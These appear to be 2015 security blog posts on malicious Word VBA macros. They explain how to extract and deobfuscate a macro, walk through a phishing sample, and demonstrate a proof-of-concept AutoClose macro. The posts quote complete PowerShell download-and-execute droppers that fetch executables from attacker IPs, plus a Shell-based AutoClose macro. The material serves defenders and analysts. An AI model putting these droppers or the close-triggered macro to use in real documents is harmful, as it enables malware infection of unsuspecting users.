First get a copy of the Word Document. If you have the email, great (skip to step 8). If you don't have the email but have a Wireshark packet capture, then try these steps ...

1.) Find the email SMTP traffic and right-click, Follow TCP Stream
2.) Save As RAW
3.) Open the file in Notepad++, it's probably Base 64 encoded (like the example below)

5.) Delete everything before and after so all you're left with the Base 64 encoded document, then Select it all

6.) Select Plugins => MIME Tools => Base 64 decode

7.) Now be careful since you have an active word document. You wouldn't want to accidentally click. That's why it's best to this in a disposable non-connected Virtual Machine. I wouldn't even save it as word, just save it as a TXT file still for now.

8.) Now use the OfficeMalScanner that I blogged about using here. And run this command that extracts a binary version of the macro
.\OfficeMalScanner.exe .\MaliciousWordDocument.txt inflate

9.) Now use the OfficeMalScanner to run this command to extract the actual VBA script
.\OfficeMalScanner.exe .\vbaProject.bin info

10.) Open that outputed file (VBAPROJECT.BIN-Macros\ThisDocument) in Notepad++ and boom! you have the code. Time for analysis.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 31, 2015

Obfuscated Malicious VBA Macro

I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.

Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variables names, a bunch of calls to chrw, and one call to Shell.

chrw returns the character associated with the numeric character code.

Shell runs the command line code that is passed to it.

How does it work? When it creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.

Then it declares 6 variables ( GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip )and in each variable it's appending 1 character at a time the malicious shell script it wants to run.

As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.

ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)

How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the Ascii Table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the Ascii Table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the Ascii Table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the Ascii Table is the letter ' '

So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that. Or just open a new word document, copy this code in, but replace the malicious Shell line

IUGuyguisdf = Shell(JHGUgisdc, 0)

with a message box

MsgBox(JHGUgisdc)

Happy hunting.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, March 23, 2015

It's not safe to Close Word Documents

Threatpost recently told us that the Dridex Malware has been seen using the AutoClose method in VBA.

First: What is the AutoClose function? This is a function in VBA (Visual Basic for Applications) that allows you to write code that will execute when a Microsoft Office document (Word, Excel, Powerpoint, etc.) is closed. A good legit example might be to prompt a user before they close to see if they want to run the spell-checker.

Second: Why is using AutoClose different than previous forms of malicious VBA? Because some malware detection detonation tools probably open malware, may even wait a period of time for code to execute, and might even attempt to trick malware into fast forwarding in time ... but I'm not sure how many also experiment with closing the document. I think most tools so far wait a period of time, and if nothing happens, the sandbox is closed and disposed of (without actually close the document). So if the malware doesn't run till document close, then many tools may miss it.

Third: I thought it'd be fun to see exactly what I'm talking about in action!

Let's forecast into the future quickly by showing you this harmless empty folder at c:\windows\temp\badstuff

Now let's start the magic. Here is my malicious, albeit harmless looking word document.

Let's say you got it in an email and you thought it was legit, so you opened it. You clicked the "Enable Content" (NOTE: This is not a good idea.) cause you were expecting something useful to show up. But instead you got nothing. The document did nothing. Looks pretty useless. (NOTE: Even if you were a malware reverse engineer, if you setup some monitoring or used some automated tool, you'd see that so far, the document has done nothing, no callouts, no file changes, no registry changes, nothing.)

Then if you're the user, you hit that harmless, never can hurt-you, easy to use Red X that closes the document.

You go on your merry way, thinking that was kinda stupid that you recieved that pointless empty word document.

Let's go back and look at that harmless empty folder c:\windows\temp\badstuff

OH SNAP! Where'd that come from?

Good thing I'm a good guy, and I'd never mean you any harm. But what if this word document wasn't from a nice guy. Looks like they somehow gained some very dangerous access to your computer. Can you trust anything on your PC anywhere? Probably not, better re-image and re-build it.

How did that happen? If you re-opened the word document and when to the Developer -> Visual Basic section under 'This Workbook', you'd see some code inside an 'AutoClose' function.

Sub AutoClose()
Shell ("powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html','c:\windows\temp\badstuff\myfakemalware.txt')")
End Sub

Code like above can be modified to do whatever the attacker wants. Something more malicious than what I did. The snippet above simply downloads a file to your c:\ drive from an internet site. Imagine if in addition there was a command added to execute that file. Uh-oh, now we're in trouble.

Please don't open unexpected files from people you weren't expecting to send them. Microsoft Office documents cannot be trusted.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 20, 2015

Extract a Macro from an Excel Doc

There are a few tools out there that extract Macros out of Microsoft Office Documents. I thought I'd walk through and example of how.

First let's create an excel document with a macro.

1.) First open Excel, select the Developer Tab, and the Visual Basic option

2.) Double-click in the VBA Project window on 'This workbook'

3.) Select the "Workbook" from the VBA code drop down list

4.) Write a Hello World type macro (Ex: MsgBox("Hello World") )

5.) Close out of the VBA code area

6.) Save the Excel doc as one of those old evil versions of Microsoft Office

Second let's extract the macro from the excel document without opening it

1.) Download one of the free Macro extraction software tools like OfficeMalScanner

2.) Run the extractor from the command line (Ex: OfficeMalScanner.exe C:\windows\temp\sample.xls info)

3.) See that it found something

4.) View the output folder

5.) Open the file 'ThisWorkbook' to see the macro code!

Monday, March 16, 2015

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)

I posted a few more details here. Just by the looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

1.) First you'll see ...

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

    A.) 'cmd' is your friend command prompt

    B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes

    C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.

    D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.

    E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.

    F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2
2.) Second you'll the Powershell script code that tries to download the payload

(New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')

A.) '(New-Object System.Net.WebClient)' is the equivalent in a high level programming language like of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.

B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\JIOiodfhioIH.cab' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
3.) Third you'll see a command script trying to extract the contents of the CAB file

'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'

A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
4.) Fourth and finally you'll see a command script trying to execute an EXE

'start %TEMP%\JIOiodfhioIH.exe;'

A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.

So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evily suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.